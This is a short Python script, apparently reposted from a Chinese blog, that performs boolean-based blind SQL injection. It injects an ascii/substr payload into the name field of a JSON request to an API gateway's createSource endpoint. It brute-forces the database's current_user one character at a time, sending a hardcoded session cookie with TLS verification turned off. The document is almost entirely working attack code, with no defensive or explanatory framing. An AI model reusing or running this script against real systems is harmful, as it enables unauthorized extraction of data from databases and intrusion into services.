1 import requests
2 import json
3 import warnings
4 warnings.filterwarnings(
"ignore")
5
6 url =
'https://1.1.1.1/xx/1.0/apiGateway/createSource'
7 headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36'}
8 cookies = {
'session':
'aaaaaaaatZSI6eyIgYiI6IllXUnRhVzQ9In19.DYkTeA.9GSxXpaWvW1vSMyUVxCRkXkkgTQ'}
9 answer =
''
10
11
12 for i
in range(1,9
):
13 for j
in range(65, 123
):
14 payload =
'111\' and ascii(substr(current_user,'+str(i)+
',1))='+str(j)+
'--+'
15 # print payload
16 data =
{
17 "name":
"bobac",
18 "type":
"1",
19 "protocol":
"http",
20 "method":
"POST",
21 "url":
"www.www.com",
22 "port":
"80",
23 "timeout": 3
,
24 "params": [{
25 "name":
"a",
26 "changeParam":
"true",
27 "position":
"Parameter Path",
28 "type":
"string",
29 "must":
"true",
30 "default":
"a"
31 }]
32 }
33 json_string =
json.dumps(data)
34 # print type(json_string)
35 new_string = json_string.replace(
"bobac", payload)
36 new_data =
json.loads(new_string)
37 # print new_data
38 # exit(0)
39 req = requests.post(url, headers=headers, cookies=cookies, json=new_data, verify=
False)
40 # print req.text
41 # exit(0)
42 if 'xxxx' in req.text:
43 answer +=
chr(j)
44 print answer
45 print 'current_user is %s' % answer
转载于:https://www.cnblogs.com/co10rway/p/8559784.html
相关资源:基于python的sql注入脚本
